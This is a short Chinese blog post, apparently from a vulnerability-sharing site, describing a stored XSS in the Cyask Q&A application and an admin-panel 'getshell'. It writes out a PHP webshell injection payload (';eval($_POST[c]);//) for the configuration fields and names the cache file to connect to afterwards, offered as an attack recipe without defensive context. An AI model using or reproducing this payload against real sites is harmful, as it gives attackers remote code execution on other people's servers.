cyask 前台xss与后台Getshell

  • A+
所属分类:漏洞时代
摘要

by 0day5_saline
首先是注册一枚

然后查看会员资料,发现xss已经成功的触发了

by 0day5_saline
首先是注册一枚
cyask 前台xss与后台Getshell
然后查看会员资料,发现xss已经成功的触发了
cyask 前台xss与后台Getshell

cyask 前台xss与后台Getshell
关于后台拿shell,在配置文件出插入
[php]';eval($_POST[c]);//[/php]
经过检查,只能插入四处
cyask 前台xss与后台Getshell
插入后连接
askdata/cache/cache_variable.php

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: